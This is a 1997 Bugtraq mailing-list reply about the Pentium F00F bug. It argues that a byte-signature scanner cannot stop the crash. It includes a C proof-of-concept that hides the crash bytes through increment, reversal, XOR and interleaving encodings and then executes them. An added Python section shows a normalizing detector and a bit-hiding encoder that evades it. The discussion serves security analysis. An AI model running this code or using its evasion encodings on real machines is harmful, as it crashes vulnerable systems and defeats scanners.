Bugtraq archives for 4th quarter (Oct-Dec) 1997: Re: Intel Pentium Bug

Re: Intel Pentium Bug

Kragen (kragenDNACO.NET)
Mon, 10 Nov 1997 07:35:16 -0500

On Sun, 9 Nov 1997, Jason Parsons wrote:
> Re the F0 0F C7 C8 Pentium bug:
>
> I just wanted to repost this from the Linux-security list.  Thought it
> might be helpful to some here.  This was posted to Linux-security by Sam
> Trenholme <setreality.samiam.org>.
>         if($data =~ /\xf0\x0f\xc7\xc8/) {
>           print "$dir/$file contains F0 0F C7 C8\n";
>           }

Is this intended to keep malicious people from crashing your computer?

It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.

Here are some trivial examples of ways to defeat it:

/*
 * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
 *
 * Note: on a system that maps data pages non-executable the jump into a
 * char array faults with SIGSEGV before the bytes ever execute, and a CPU
 * without the erratum raises an illegal-instruction fault instead of
 * hanging.
 */

#include <string.h>

/* every byte stored one above the target; decrementing restores it */
char incr[] = "\xf1\x10\xc8\xc9";
void
fix_incr (char *s) {
        for (; *s; s++) --*s;
}

/* the target bytes stored in reverse order */
char backwards[] = "\xc8\xc7\x0f\xf0";

void
reverse_inner(char *begin, char *end) {
        while (end > begin) {
                char t = *end;
                *end = *begin;
                *begin = t;
                end--;
                begin++;
        }
}

void
reverse(char *s) {
        reverse_inner(s, s+strlen(s)-1);
}

/* the target XORed with 1: f0^1 0f^1 c7^1 c8^1.  The original post had
 * \xc9\xc8 for the last two bytes, which XOR back to c8 c9, not c7 c8. */
char xored[] = "\xf1\x0e\xc6\xc9";
void
xor_pad (char *s, char pad) {
        for (; *s; s++) *s ^= pad;
}

/* target bytes at odd positions between filler characters; the trailing
 * filler 'B' keeps the stride-2 walk below from reading past the
 * terminator (the original array ended on '\xc8', so t stepped past '\0') */
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
'B', '\0'};
void
deinterleave (char *s) {
        char *t = s + 1;
        for (; *t; t += 2, s++) *s = *t;
        *s = '\0';
}

int
main() {
        void (*f)(void);

        fix_incr(incr);

        reverse(backwards);

        xor_pad(xored, 1);

        deinterleave(interleaved);

        /* explicit cast: C does not convert char * to a function pointer */
        f = (void (*)(void)) incr;  /* or backwards, or xored, or interleaved */
        (*f)();
        return 0;
}


Now, none of these are very subtle.  I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it.  The possibilities are
endless.

A trusted-compiler system seems to be the only possible software
protection against attacks like these.

Kragen
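As an added example (not code from the post, nor from Sam Trenholme's script): a Python scanner that extends the quoted literal check with the inverse of each encoding in the C program above, plus a decoder for the "second-to-last bit of each character" scheme the post only sketches. The sample byte strings and the cover text are constructed here. It shows that normalizing away the four enumerated tricks catches exactly those four and nothing further.

```python
F00F = b"\xf0\x0f\xc7\xc8"

def naive_scan(data: bytes) -> bool:
    """The quoted Perl check: a literal search for F0 0F C7 C8."""
    return F00F in data

def normalized_views(data: bytes):
    """Yield the inverse of each encoding the post's C program uses."""
    yield data
    yield data[::-1]                                # undo reverse()
    for k in range(1, 256):
        yield bytes((b - k) & 0xFF for b in data)   # undo fix_incr()-style shifts
        yield bytes(b ^ k for b in data)            # undo xor_pad() with any byte
    for stride in (2, 3, 4):
        for off in range(stride):
            yield data[off::stride]                 # undo deinterleave()

def normalized_scan(data: bytes) -> bool:
    """Signature scan repeated over every normalized view."""
    return any(F00F in view for view in normalized_views(data))

def bit1_decode(cover: bytes) -> bytes:
    """Reassemble bytes from bit 1 of each cover character, MSB first;
    this is the scheme the post describes in prose (constructed here)."""
    bits = [(c >> 1) & 1 for c in cover]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8])))
    return bytes(out)

def bit1_encode(payload: bytes, cover: bytes) -> bytes:
    """Constructed cover text that bit1_decode() turns back into payload."""
    bits = [(b >> (7 - j)) & 1 for b in payload for j in range(8)]
    return bytes((c & ~2) | (bit << 1) for c, bit in zip(cover, bits))

# Constructed samples: the four C arrays from the post, plus the in-text variant.
SAMPLES = {
    "incr": b"\xf1\x10\xc8\xc9",
    "backwards": b"\xc8\xc7\x0f\xf0",
    "xored": b"\xf1\x0e\xc6\xc9",
    "interleaved": b"X\xf0Y\x0fZ\xc7A\xc8",
    "in_text": bit1_encode(F00F, b"the quick brown fox jumps over a lazy dog"),
}
```

The literal check misses all five samples; the normalized scan recovers the four the C program uses but still sees only ASCII text in the fifth, even though `bit1_decode()` turns it back into the exact signature.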